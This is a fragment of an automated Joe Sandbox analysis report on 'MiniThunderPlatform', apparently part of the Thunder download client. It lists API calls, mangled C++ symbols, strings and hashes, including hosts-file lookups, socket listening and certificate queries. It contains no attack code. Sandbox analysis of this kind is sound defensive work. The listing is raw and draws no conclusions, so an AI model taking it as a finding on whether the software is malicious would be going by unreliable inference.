                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z.MSVCP71(?,10277ABC,?,10277ABC,?,10277ABC,?,1027B15C), ref: 1001DBE1
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 1001DBEE
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z.MSVCP71 ref: 1001DBF4
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 1001DBFB
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z.MSVCP71 ref: 1001DC01
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 1001DC08
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z.MSVCP71 ref: 1001DC0E
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 1001DC15
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001DD13
                                                                                                                                              • ??_D?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ.MSVCP71 ref: 1001DD23
                                                                                                                                              • ?str@?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71(?), ref: 1001DC8C
                                                                                                                                                • Part of subcall function 10009F50: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,10013095,?,00000000,?,?,?,?,?,00000020,00000026,?,00000400,00000026), ref: 10009F65
                                                                                                                                                • Part of subcall function 10009F50: ??3@YAXPAX@Z.MSVCR71(?,?,?,?,10013095,?,00000000,?,?,?,?,?,00000020,00000026,?,00000400), ref: 10009F76
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 1001DDAD
                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1001DDBB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@$D@std@@V?$allocator@$D@2@@std@@$??1?$basic_string@$D@std@@@std@@$??0?$basic_string@$CriticalSectionV01@$??$?6??6?$basic_ostream@D@std@@@0@LeaveV10@V12@V12@@V?$basic_ostream@$?assign@?$basic_string@$H_prologInterlockedModuleV?$basic_string@$??$?8??0?$basic_ostringstream@??3@??4?$basic_string@?append@?$basic_string@?str@?$basic_ostringstream@CountCreateD?$basic_ostringstream@D@1@@std@@D@2@@0@D@2@@2@DecrementEnterFileHandleIncrementInitializeInstanceNameObjectSingleTickWait
                                                                                                                                              • String ID: asyn_frame.dll$env$product_flag$thunder_version
                                                                                                                                              • API String ID: 3075664540-691952345
                                                                                                                                              • Opcode ID: 68782e02d9a0ff45b462b692d48b5a291eca29301b16a3dfdcb496a8e18e4fd2
                                                                                                                                              • Instruction ID: 43ad9235691746cb3bcd4ac6290ed063ee86bf910e3fff22e7c745a696058275
                                                                                                                                              • Opcode Fuzzy Hash: 68782e02d9a0ff45b462b692d48b5a291eca29301b16a3dfdcb496a8e18e4fd2
                                                                                                                                              • Instruction Fuzzy Hash: 94223875905258DFCB61EBA4CC8CA9DBBB9EF19300F5045D9E44AEB251DB31AE84CF10

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 004377F4
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71 ref: 00437806
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00437833
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00437894
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71 ref: 004378A6
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 004378D0
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 004378E9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$??1?$basic_string@_$?data@?$basic_string@_
                                                                                                                                              • String ID: XLBugHandler.dll$XLBugReport.exe$_XL_InitBugHandler@20$_XL_SetAlwaysSendReport@4$_XL_SetBugReportRootDir@4$_XL_SetPeerID@4$_XL_SetReportShowMode@4
                                                                                                                                              • API String ID: 855986704-2543232268
                                                                                                                                              • Opcode ID: fd97b4a9d2dd10f17b191d6b3a1f47f54e27affca514a7a6942c182d33c27001
                                                                                                                                              • Instruction ID: 7d2c1c8e8e835538649065c82bc670cb9795215914730fc2ebbfd3a8bac1ab38
                                                                                                                                              • Opcode Fuzzy Hash: fd97b4a9d2dd10f17b191d6b3a1f47f54e27affca514a7a6942c182d33c27001
                                                                                                                                              • Instruction Fuzzy Hash: FE81D8B1D00658DFDB60FBA4DC467CDBF74AF04318F11019AE859A7281DB395E88CB9A

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 1005C9B0: ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0), ref: 1005CA0E
                                                                                                                                                • Part of subcall function 1005C9B0: GetVersionExA.KERNEL32 ref: 1005CA28
                                                                                                                                                • Part of subcall function 1005C9B0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(\system32\drivers\etc\), ref: 1005CA48
                                                                                                                                                • Part of subcall function 1005C9B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1005CA55
                                                                                                                                                • Part of subcall function 1005C9B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005CA7A
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0,?,00000020,00000024,00000000), ref: 1005CBFD
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 1005CC11
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005CC27
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Hosts), ref: 1005CC53
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005CC7A
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(hosts), ref: 1005CC89
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?), ref: 1005CCB0
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 1005CCF4
                                                                                                                                              • GetLastError.KERNEL32 ref: 1005CD03
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005CD14
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 1005CD2C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005CD52
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?), ref: 1005CD60
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005CD74
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 1005CDA4
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1005CDB5
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005CDCE
                                                                                                                                                • Part of subcall function 10009F50: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,10013095,?,00000000,?,?,?,?,?,00000020,00000026,?,00000400,00000026), ref: 10009F65
                                                                                                                                                • Part of subcall function 10009F50: ??3@YAXPAX@Z.MSVCR71(?,?,?,?,10013095,?,00000000,?,?,?,?,?,00000020,00000026,?,00000400), ref: 10009F76
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005CDF1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$??3@D@1@@std@@D@2@@0@FindV01@@V?$basic_string@$??$?8??$?9CloseErrorFileFirstLastV01@VersionY?$basic_string@
                                                                                                                                              • String ID: Hosts$hosts
                                                                                                                                              • API String ID: 3749606605-2575723251
                                                                                                                                              • Opcode ID: 2b9d935adae9bb3190ad93673b41ab5b0768120ba05e43d9d5d519f5486a1b25
                                                                                                                                              • Instruction ID: 2260d7e3b3166f00db9d3bee59d158ab0cc18d3f91f7b59bf47c8bbf000ac08b
                                                                                                                                              • Opcode Fuzzy Hash: 2b9d935adae9bb3190ad93673b41ab5b0768120ba05e43d9d5d519f5486a1b25
                                                                                                                                              • Instruction Fuzzy Hash: 78518C351083919FD320CF24C888A9FBBE4EFAA714F044A5DF89A83251DB749548CFA3
                                                                                                                                              APIs
                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 100596D6
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Create request_list Event error), ref: 100596EC
                                                                                                                                                • Part of subcall function 1002BD70: ??0exception@@QAE@XZ.MSVCR71(?,?,00000000,102423C9,000000FF,1021B19D,00000000,?,10056267), ref: 1002BD8D
                                                                                                                                                • Part of subcall function 1002BD70: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1002BDA9
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B6AA0,?), ref: 1005970F
                                                                                                                                              • GetTickCount.KERNEL32 ref: 1005971D
                                                                                                                                              • GetPrivateProfileIntA.KERNEL32(dns,pto_seconds,00000003,-00000004), ref: 10059772
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1005977B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005978A
                                                                                                                                              • GetPrivateProfileIntA.KERNEL32(dns,timeout_period,00000168,-00000004), ref: 100597D1
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?), ref: 100597DA
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100597E9
                                                                                                                                              • GetPrivateProfileIntA.KERNEL32(dns,timeout_counts_period,0000003C,-00000004), ref: 1005982D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?), ref: 10059836
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10059845
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$PrivateProfile$??0?$basic_string@$??0exception@@CountCreateEventExceptionThrowTickV01@@
                                                                                                                                              • String ID: Create request_list Event error$dns$pto_seconds$stat.dat$timeout_counts_period$timeout_period
                                                                                                                                              • API String ID: 3601289781-4286181566
                                                                                                                                              • Opcode ID: 21562e41380aa452408df3b9dd44ca40aab9808455fc5cf2bbd7a28db062d0bb
                                                                                                                                              • Instruction ID: 09cfa8f55c4aaa8069e09845e468c5267cd1ecf2eb219d4d7996330143164a67
                                                                                                                                              • Opcode Fuzzy Hash: 21562e41380aa452408df3b9dd44ca40aab9808455fc5cf2bbd7a28db062d0bb
                                                                                                                                              • Instruction Fuzzy Hash: 39518EB55043819FD714DF68C888A9AFBE8FF69304F00895DF49A93652DBB4E508CF62
                                                                                                                                              APIs
                                                                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 10048C29
                                                                                                                                              • htons.WS2_32 ref: 10048C4F
                                                                                                                                              • bind.WS2_32(000000FF,00000002,00000010), ref: 10048C79
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 10048C84
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(bind call error), ref: 10048C98
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B9B68,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10048CC5
                                                                                                                                              • getsockname.WS2_32(000000FF,?,?), ref: 10048CE8
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(getsockname call error), ref: 10048CFC
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B9B68,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10048D27
                                                                                                                                              • htons.WS2_32(?), ref: 10048D34
                                                                                                                                              • listen.WS2_32(000000FF,00000005), ref: 10048D44
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 10048D4F
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(listen call error), ref: 10048D60
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B9B68,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10048D90
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@ExceptionThrowU?$char_traits@V?$allocator@$ErrorLasthtons$bindgetsocknamelistensocket
                                                                                                                                              • String ID: bind call error$getsockname call error$listen call error
                                                                                                                                              • API String ID: 1873545918-4072321061
                                                                                                                                              • Opcode ID: 5bd5a8541dbb67bd95ebceb7e37830b5b6ff41ee5724ca2e9890f613cdda1151
                                                                                                                                              • Instruction ID: 6061e81bcbb5cd75baddf0e89d09f41c8d5b4957d8a706b57dd876c3ff4046c5
                                                                                                                                              • Opcode Fuzzy Hash: 5bd5a8541dbb67bd95ebceb7e37830b5b6ff41ee5724ca2e9890f613cdda1151
                                                                                                                                              • Instruction Fuzzy Hash: 134105750047919BC330DF60D888B9BB7F9FF98720F404E0DF59A92690DB75A548CB66
                                                                                                                                              APIs
                                                                                                                                              • CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,?,?,?,00000000,00000000,00000000), ref: 00436CF1
                                                                                                                                              • CryptMsgGetParam.CRYPT32(00000000,00000006,00000000,00000000,?), ref: 00436D1B
                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 00436D3D
                                                                                                                                              • CryptMsgGetParam.CRYPT32(00000000,00000006,00000000,00000000,?), ref: 00436D72
                                                                                                                                              • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,?,00000000), ref: 00436DD7
                                                                                                                                              • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 00436E08
                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00436E35
                                                                                                                                              • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 00436E6B
                                                                                                                                              • ??4?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z.MSVCP71(00000000), ref: 00436E88
                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 00436E9E
                                                                                                                                              • CertFreeCRLContext.CRYPT32(00000000), ref: 00436EB1
                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 00436EC7
                                                                                                                                              • CertCloseStore.CRYPT32(00000000,00000000), ref: 00436EDC
                                                                                                                                              • CryptMsgClose.CRYPT32(00000000), ref: 00436EEF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Cert$CryptLocal$Free$AllocCloseNameParamStoreString$??4?$basic_string@_CertificateContextFindObjectQueryU?$char_traits@_V01@V?$allocator@_W@2@@std@@W@std@@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1901610339-0
                                                                                                                                              • Opcode ID: 315dd38093dd16d626aca0698f8aee7929f8243d652272183dfc55defbda2940
                                                                                                                                              • Instruction ID: 9855d129bd1c4c46509c3229f4471534e49b447ee1d9d00d22a43a7a0cfa85ce
                                                                                                                                              • Opcode Fuzzy Hash: 315dd38093dd16d626aca0698f8aee7929f8243d652272183dfc55defbda2940
                                                                                                                                              • Instruction Fuzzy Hash: 837187B2D00218AFEB60EB95CC86FDDB774AB08304F028159F615BB281CB759D84CF99
                                                                                                                                              APIs
                                                                                                                                              • WSARecvFrom.WS2_32(?,?,00000001,?,?,?,00000010,?,Function_00035BD0), ref: 1005165B
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 10051666
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(asyn read request error), ref: 10051686
                                                                                                                                              • _CxxThrowException.MSVCR71(00000010,102B9B68,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 100516AD
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@$ErrorExceptionFromH_prologLastRecvThrowV01@@
                                                                                                                                              • String ID: .\asyn_udp_device.cpp$asyn read request error$buffer_pos+expected_bytes <= operation_ptr->buffer_len()$operation_ptr->is_pending() == false$thunder_assert
                                                                                                                                              • API String ID: 2555452174-2844270807
                                                                                                                                              • Opcode ID: 03c40b7de2b612a432d914a7cf40f890ae5c82df867a1c908d303177aa63d4e0
                                                                                                                                              • Instruction ID: f96af627ed583a1d50f07d45b858b5d6197e0ae5425749f95e5110d3d4598a01
                                                                                                                                              • Opcode Fuzzy Hash: 03c40b7de2b612a432d914a7cf40f890ae5c82df867a1c908d303177aa63d4e0
                                                                                                                                              • Instruction Fuzzy Hash: 3D4168B1504740AFC360CF29C880F9BBBE9FB99304F548A1EF19AC7241EB71A4498B61
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 10051320: socket.WS2_32(00000002,00000002,00000000), ref: 1005134E
                                                                                                                                                • Part of subcall function 10051320: WSAGetLastError.WS2_32 ref: 1005135C
                                                                                                                                                • Part of subcall function 10051320: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(create socket object error), ref: 1005136D
                                                                                                                                                • Part of subcall function 10051320: _CxxThrowException.MSVCR71(?,102B9B68), ref: 10051397
                                                                                                                                                • Part of subcall function 10051320: WSAIoctl.WS2_32(?,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 100513D0
                                                                                                                                                • Part of subcall function 10051320: setsockopt.WS2_32(000000FF,0000FFFF,00000020,?,00000001), ref: 100513ED
                                                                                                                                                • Part of subcall function 10051320: WSAGetLastError.WS2_32 ref: 100513F8
                                                                                                                                                • Part of subcall function 10051320: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(setsockopt error), ref: 10051409
                                                                                                                                                • Part of subcall function 10051320: _CxxThrowException.MSVCR71(?,102B9B68), ref: 10051433
                                                                                                                                              • htons.WS2_32 ref: 100514AB
                                                                                                                                              • bind.WS2_32(?,00000002,00000010), ref: 100514C9
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 100514D4
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(bind call error), ref: 100514E5
                                                                                                                                                • Part of subcall function 1021ADF0: ??0exception@@QAE@XZ.MSVCR71(?,00000000), ref: 1021AE10
                                                                                                                                                • Part of subcall function 1021ADF0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1021AE35
                                                                                                                                                • Part of subcall function 1021ADF0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(, error code: ,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1021AE47
